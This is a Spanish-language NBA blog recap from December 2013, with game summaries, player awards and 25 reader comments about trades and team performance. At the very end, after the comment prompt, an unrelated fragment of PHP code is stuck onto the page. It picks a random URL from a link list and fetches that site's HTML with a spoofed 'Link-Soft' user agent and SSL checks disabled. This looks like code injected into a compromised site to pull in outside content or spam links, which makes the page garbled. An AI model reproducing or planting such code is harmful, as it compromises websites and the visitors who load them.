La Crónica: Marcando territorio

10 de December de 2013 por Simon

6 partidos en el menú de ayer pero sin ningún plato principal. En principio, duelos desiguales que como siempre terminaron dejando alguna sorpresa que otra. Entre lo más destacado de la jornada, Clippers se rehízo de su batacazo en Cleveland este fin de semana venciendo en Philadelphia, Sacramento no dio opción a Dallas y los Bobcats dieron un buen aviso a los Warriors. Si siguen así no serán equipo de Play Off.

Entre las sorpresas de la jornada se encuentra la cómoda victoria de Sacramento ante los Dallas Mavericks bajo la apática mirada en la grada de Rudy Gay. Sacramento comenzó el partido enchufadísimo y pronto logró las primeras ventajas. Dallas no consiguió parar el caudal ofensivo de Sacramento hasta el segundo cuarto e incluso a principio del tercero parecía ser capaz de remontar el encuentro pero un nuevo arreón de de los Kings liderado por Cousins y Derrick Williams, que cuajó el mejor partido de su carrera, volvió a dejar a Dallas en fuera de juego y aumentó la ventaja hasta los 20 puntos. El último cuarto fue un mero trámite (97-112). No sabemos si la presencia de Rudy Gay en la grada influyó en el tremendo partido de Demarcus Cousins que pareció querer mandar un aviso para dejar claro quien es el jefe en Sacramento. El otro partido entre equipos del Oeste sí que discurrió por los derroteros esperados y Portland venció a Utah en Salt Lake City. Los locales siempre dieron la cara y obligaron a los Blazers a jugar fuerte hasta los últimos minutos para amarrar la victoria (105-94). 

La visita de Denver Nuggets a Washington suponía a priori el partido más igualado de la jornada y lo terminó siendo. Lo que no esperaba nadie es que ninguno de los dos equipos fuera capaz de superar los 75 puntos. Los equipos llegaron igualados a un último cuarto en el que se siguió el mismo guión que el resto del partido: muchas pérdidas y desacierto de cara al aro. Un espectáculo, vamos. Washington ganaba de 1 a falta de 40 segundos pero un tapón y un mate en la misma jugada de Faried puso por delante a los Nuggets y a partir de ahí ambos equipos decidieron que no querían ganar, Nuggets fallando tiros libres y perdiendo la bola y Wizards siendo incapaces de meter canastas fáciles. Así que el partido terminó cayendo del lado de los visitantes que cierran así su mini-gira por el Este (75-74). Otro equipo que anda de gira por el Este son los Clippers que ayer vencieron en un partido sin brillo a unos Sixers que siguen sin contar con Michael Carter Williams (94-83). Blake Griffin y Chris Paul tuvieron que dar lo mejor de sí mismos ante la escasa ayuda que les ofrecieron sus compañeros. Mucho tendrán que mejorar los Clippers pues cada vez están más lejos de la cabeza del oeste.

Los Warriors siguen sembrando dudas acerca de su rendimiento y porvenir de esta temporada. Ayer fueron vencidos por los Bobcats de un Kemba Walker espectacular a pesar del partidazo de Stephen Curry. La diferencia de aportación entre un banquillo y otro fue lo que marcó la diferencia (111-115). Para terminar la jornada, Memphis Grizzlies se bastó de un gran primer tiempo para obtener una victoria cómoda ante Orlando Magic. A pesar del empuje final de los vistantes la victoria nunca corrió peligro (85-94).

PREMIOS

MVP: “Hola Rudy, soy Demarcus Cousins y está es mi tarjeta”. 32 puntos y 19 rebotes nada menos. Gay haría bien en respetar la jerarquía de Sacramento.

Rookie: Victor Oladipo ha jugado otro típico partido de los suyos: 10 puntos, 6 rebotes, 3 asistencias, 3 robos y… 4 pérdidas.

Sorpresa: 31 puntos, 5 rebotes y 4 robos jugando como alero. Si Derrick Williams se hubiera acercado a este nivel en los Wolves no habría sido traspasado. Veremos qué pasa cuando entre Rudy Gay. Andrew Nicholson fue el mejor de los Magic con 19 puntos, 11 rebotes y 4 tapones.

Decepción: Spencer Hawes está jugando su mejor temporada como profesional pero ayer naufragó ante Griffin y Jordan. Se quedó en solo 2 puntos tras anotar 1 de los 6 tiros que intentó. Tras 20 partidos anotando al menos un triple, se acabó la racha.

Esfuerzo en vano: Los 43 puntos, 6 rebotes, 9 asistencias y 2 tapones de Stephen Curry no sirvieron para que los Warriors se llevaran la victoria de Charlotte. Los compañeros de banquillo decidieron no presentarse.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Denise dice:
    #1

    Tal y como está jugando Leuer y Ed Davis cuando está sano, los Grizzlies deberían ir planteandose ya traspasar a Zach Randolph antes de que este verano se pire y no consigan nada a cambio.
    Con Davis, Leuer en el PF y Marc y Koufos en el C mas lo que puedan pillar por ahí tienen pintura de sobra.

      Citar

  2. telekoman dice:
    #2

    No puedo estar más de acuerdo con Denise. Leuer al poder.

      Citar

  3. TheDeerHunter dice:
    #3

    Segundo partido consecutivo en el que los Wizards la cagan en la jugada final.
    Van 9-11 y entre que son el equipo que más prórrogas ha jugado y este tipo de derrotas igualadas podrían estar yendo perfectamente por encima de Atlanta en la clasificación. Y no hablo de los problemas por las ausencias, Beal, Nene, Porter… aunque éste último no ha podido comenzar peor.

      Citar

  4. Vader dice:
    #4

    ¿Shumpert + algo por Zach Randolph? Por favor!!!

      Citar

  5. txusma dice:
    #5

    Vader:
    ¿Shumpert + algo por Zach Randolph? Por favor!!!

    Este Shumpert que no hace nada bien? Los Grizzlies ya tienen a Tony Allen y Jamall Franklin para aportar lo que que puede Shumpert. No picarían. Una amenaza exterior sí que les iría bien.

      Citar

  6. rumbero dice:
    #6

    Cuando ha pasado a molar McRoberts que yo no me he enterado? Segunda vez que veo a los Bobcats esta temporada y segunda vez que se sale. Gran defensa sobre Lee y solventando unos cuantos atascos desde el poste alto hasta que se han picado Kemba y Curry al final. Supongo que Charlotte bajará de ese TOP-5 defensivo donde está ahora mismo (han jugado contra mucho equipo del Este que ya sabemos como está) pero lo cierto es que controlaron bastante bien el partido hasta que Curry entró en combustión. Otra partido por encima de los 40 partidos y que pierde GSW. Por mucho que echen en falta a Iggy no acaban de andarnada finos no

      Citar

  7. Denise dice:
    #7

    Si Danny Granger volviese a un nivel All Star o parecido, un Randolph por Granger y Scola no le vendría nada mal a MEM y a IND

      Citar

  8. Ruxixón dice:
    #8

    Lo de Leuer es una sorpresa absoluta,al menos para mí,vaya ojo que tienen en Milwaukee para desarrollar jugadores para otros equipos xD.

    ¿Alguien puede decirme por dónde le vienen los problemas a los Warriors?¿sólo tema de banquillo?Es que hoy hablamos de que han perdido contra un equipo que juega a posesiones largas y les han calzado 115 puntos.Con Minny están siendo la decepción de la temporada.A su favor que han jugado 14 partidos on the road,por 8 en casa.

      Citar

  9. Vader dice:
    #9

    txusma: Este Shumpert que no hace nada bien? Los Grizzlies ya tienen a Tony Allen y Jamall Franklin para aportar lo que que puede Shumpert. No picarían. Una amenaza exterior sí que les iría bien.

    Ok, ok, tenemos un JR Smith, mejor sexto hombre y levantará las noches de Memphis como no se veia desde Elvis!! 😀

      Citar

  10. Vader dice:
    #10

    Yo creo que el problema de los Warriors es que no defienden como el año pasado. En ese aspecto fueron una sorpresa y creo que han perdido algo de hambre para defender igual.

    Y totalmente de acuerdo con Rumbero, a McRoberts le han dado una cucharada de jarabe “talentomil” y no nos habiamos enterado…

      Citar

  11. Simon dice:
    #11

    Sinceramente, creo que el estatus en la liga de Iman Shumpert está totalmente inflado a la vista de los rumores y traspasos que se oyen. Si, es un muy buen defensor cuando se pone a ello, pero poco más. En ataque es un jugador (muy) del montón y además, en vez de evolucionar… está involucionando. Vive de las rentas de un primer año en el que dejó muy buenas sensaciones. Además su historial de lesiones y operaciones secretas tampoco invita a apostar fuerte por él.
    Pero yo alucino cuando veo un Shumpert + algo por Randolph… cuando quizás el traspaso debería ser Algo + Shupert por Randolph XD XD
    Puestos a deshacerse de Randolph más le valdría a Grizzlies hacer un Jeremy Lamb + Perry Jones y alguna rondilla por Randolph. Ahí si que saldrían ambos equipos beneficiados. ( en el caso de que fuera la marcha de Randolph ) o intentar algo a tres bandas para traer a Evan Turner o incluso Wilson Chandler de Denver… gente de ese pelaje… pero Shumpert? No, por favor.

      Citar

  12. Vader dice:
    #12

    Nada, no me tomeis en serio que estaba de broma…

      Citar

  13. rumbero dice:
    #13

    Ruxixón:
    ¿Alguien puede decirme por dónde le vienen los problemas a los Warriors?¿sólo tema de banquillo?Es que hoy hablamos de que han perdido contra un equipo que juega a posesiones largas y les han calzado 115 puntos.Con Minny están siendo la decepción de la temporada.A su favor que han jugado 14 partidos on the road,por 8 en casa.

    Sin centrarse en el partido de ayer (donde estuvieron mal en defensa pero también en ataque hasta que se destapó Curry) a mi no me parece que estén defendiendo mucho peor que la temporada pasada. Les falta un punto de agresividad y han tenido más pájaras de la cuenta, pero nada nuevo andando por ahí Curry y Lee que cada tres partidos hace All Star al 4 rival. A este último por cierto si lo veo un peldaño por debajo de la temporada pasada. Casi que me preocupan más ofensivamente.
    Lo del calendario que comentas si es como para tenerlo en cuenta. De los últimos 10 partidos 8 han sido fuera y si no entendí mal creo que es el equipo que menos ha jugado contra equipos del este. E insisto con lo de Iguodala porque es fundamental en su esquema. A la vez que obliga a las defensas a no centrarse tanto en Thompson y Curry descarga de mucho trabajo a este último. Es que en muchos de los partidos sin él los Warriors se han agarrado a que Curry las meta de todos los colores y no siempre vale.

      Citar

  14. Simon dice:
    #14

    En los Warriors yo creo que el factor principal puede ser también la falta de Jack, que el año pasado fue un factor diferencial para los Warriors. Cuando él y Curry compartian pista eran un equipo muchísimo más peligroso. Su falta también obliga a Curry a asumir más el balón lo que repercute también en las posibilidades de sorprender al rival.

      Citar

  15. Denise dice:
    #15

    Si todo va bien, Granger jugará el viernes contra los Bobcats, como muy tarde el lunes frente a Detroit.

    Por otra parte, ¿cuanta pasta creeis que tendrán que soltar los Pacers para retener a Stephenson el año que viene? ¿8 kilos al año mas o menos?

      Citar

  16. Esteban dice:
    #16

    Denise:
    Si todo va bien, Granger jugará el viernes contra los Bobcats, como muy tarde el lunes frente a Detroit.

    Por otra parte, ¿cuanta pasta creeis que tendrán que soltar los Pacers para retener a Stephenson el año que viene? ¿8 kilos al año mas o menos?

    si hasta ahi creo que podrian pagar los pacers, mas no, ya

      Citar

  17. Esteban dice:
    #17

    Denise:
    Si todo va bien, Granger jugará el viernes contra los Bobcats, como muy tarde el lunes frente a Detroit.

    Por otra parte, ¿cuanta pasta creeis que tendrán que soltar los Pacers para retener a Stephenson el año que viene? ¿8 kilos al año mas o menos?

    si hasta ahi creo que podrian pagar los pacers, mas no, ya que el expiring de Granger lo asume George y su nuevo contrato, mientras que entre Mahinmi y Scola se gastan mas de 8 millones en el banco y los super contratos de Hibbert, Hill y West

    o pagan impuesto de lujo (cosa que debrian hacer malditos tacaños) o logran una renovacion baja de Sthephenson de entrre 6 y 8 millones o lo pierden

      Citar

  18. Vader dice:
    #18

    Bueno si los Pacers no están dispuestos a pagar algo de impuesto de lujo estos años para aspirar al anillo (y digo algo, un poquito y sin exagerar) no se cuando lo harán…

      Citar

  19. Esteban dice:
    #19

    Vader:
    Bueno si los Pacers no están dispuestos a pagar algo de impuesto de lujo estos años para aspirar al anillo (y digo algo, un poquito y sin exagerar) no se cuando lo harán…

    bueno, el Thunder tenia expectativas de armar una dinastia y por no pagar impuesto de lujo dejaron ir a Harden y hoy juega de escolta Shefolosha…

      Citar

  20. HisRoyalAirness dice:
    #20

    Qué os parece un: Carmelo por Asik + Lin?
    Digo por moverlo antes de que se vaya gratis

      Citar

  21. Vader dice:
    #21

    HisRoyalAirness:
    Qué os parece un: Carmelo por Asik + Lin?
    Digo por moverlo antes de que se vaya gratis

    Veo imposible que los Knicks traspasen a Melo a menos que el se pronuncie de forma muy clara diciendo que no va a renovar seguro, y no creo que eso pase. Si en verano no lo pueden convencer con algún movimiento en el equipo nos puede pasar como a los Lakers con Howard. Es que si lo traspasan sin que él haya dicho algo de forma muy clara Dolan no puede salir a la calle.

    Y luego en el supuesto de que lo traspasaran los Knicks entrarían de lleno en modo reconstrucción y les interesaría recibir rondas o jugadores jóvenes con proyección. Ni Asik ni Lin me encajan en esa descripción.

    Un traspaso interesante (ciencia ficción mia) sería a Boston. Chandler + Melo por contratos basura de Boston (Wallace, Humphries) + la ronda de Nets de este año y alguna más. A Boston lo pones de nuevo como potencia con Rondo, Bradley, Melo, Chandler, etc… y Knicks podría ir reconstruyendo en torno a la ronda del año que viene. Pero vamos que es una paja mental mia… Aunque creo que un buen ejemplo de como en la NBA se puede pasar en un día de una situación a otra bien diferente en un segundo.

    Saludos

    P.D: Por cierto, seguimos a lo nuestro. Ayer Irving y J.Jack se dieron un festín que no veas… ¿Cómo puede ser que Prigioni tenga que defender a Irving? ¿No puede poner a Shumpert o JR.Smith encima de él?

      Citar

  22. Esteban dice:
    #22

    Vader: Veo imposible que los Knicks traspasen a Melo a menos que el se pronuncie de forma muy clara diciendo que no va a renovar seguro, y no creo que eso pase. Si en verano no lo pueden convencer con algún movimiento en el equipo nos puede pasar como a los Lakers con Howard. Es que si lo traspasan sin que él haya dicho algo de forma muy clara Dolan no puede salir a la calle.

    Y luego en el supuesto de que lo traspasaran los Knicks entrarían de lleno en modo reconstrucción y les interesaría recibir rondas o jugadores jóvenes con proyección. Ni Asik ni Lin me encajan en esa descripción.

    Un traspaso interesante (ciencia ficción mia) sería a Boston. Chandler + Melo por contratos basura de Boston (Wallace, Humphries) + la ronda de Nets de este año y alguna más. A Boston lo pones de nuevo como potencia con Rondo, Bradley, Melo, Chandler, etc… y Knicks podría ir reconstruyendo en torno a la ronda del año que viene. Pero vamos que es una paja mental mia… Aunque creo que un buen ejemplo de como en la NBA se puede pasar en un día de una situación a otra bien diferente en un segundo.

    Saludos

    P.D: Por cierto, seguimos a lo nuestro. Ayer Irving y J.Jack se dieron un festín que no veas… ¿Cómo puede ser que Prigioni tenga que defender a Irving? ¿No puede poner a Shumpert o JR.Smith encima de él?

    esta fantasia de Vader no estaria nada mal y los Celtics de tener alkgo asi a mano deberian jalar el gatillo

    hoy por hoy estan en PO y a la espera de Rondo, lo que deberia hacerlos mejores y asegurar su lugar en postemporada, y la adicion de Melo y Chandler, les daria la linea frontal suficiente para ser una alternativa

    vamos que en el este nadie se la va a jugar un poco? hoy hay solo dos equipos candidatos a final de conferencia, si al Heat se le lesiona lebron, Wade o Bosh, o dos de estos y a los Pacers, Geroge, Hibbert, West o dos de cualquiera de su 5 inicial, deberia haber un tercer equipo que al menos espere agazapado y tenga alguna chance de tomar el lugar q alguno de los gigantes deje libre

      Citar

  23. txusma dice:
    #23

    Ese tercer equipo serán los Nets. Creo q se acabarán clasificando y además sin apuros y en Playoffs gánales tu que a mi me da la risa.

      Citar

  24. Vader dice:
    #24

    Bueno de momento la risa la dan ellos. Por lo menos suena que Pierce saldrá en la segunda unidad, algonque se tendria que haber hecho desde el primer dia. Y Garnett lo mismo. Yo pondria a Evans y Kirilenko titulares para el trabajo sucio y Pierce y Garnett liderando la segunda unidad.

    Saludos

      Citar

  25. txusma dice:
    #25

    Vader:
    Bueno de momento la risa la dan ellos. Por lo menos suena que Pierce saldrá en la segunda unidad, algonque se tendria que haber hecho desde el primer dia. Y Garnett lo mismo. Yo pondria a Evans y Kirilenko titulares para el trabajo sucio y Pierce y Garnett liderando la segunda unidad.

    Saludos

    Sí, dan la risa pero están a una sola victoria de los Playoffs y yo en playoffs prefiero no encontrarme con un equipo que cuente con Pierce y Garnett (además de Lopez y Deron).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>